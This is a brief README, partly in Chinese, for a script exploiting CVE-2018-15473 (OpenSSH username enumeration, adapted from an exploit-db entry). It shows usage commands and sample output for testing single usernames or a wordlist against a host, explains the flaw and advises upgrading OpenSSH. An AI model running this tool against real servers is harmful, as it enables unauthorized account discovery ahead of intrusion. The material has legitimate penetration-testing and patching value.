SSH用户名枚举漏洞利用 (OpenSSH 2.3 < 7.7)
原始漏洞利用代码的编辑版本:https://www.exploit-db.com/exploits/45233
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
系统对有效和无效的身份验证尝试会做出不同的响应。远程用户可以通过发送特制请求来确定目标系统上的有效用户名。因此,远程用户可以确定目标系统上的有效用户名。
OpenSSH服务器应升级到7.7或更高版本。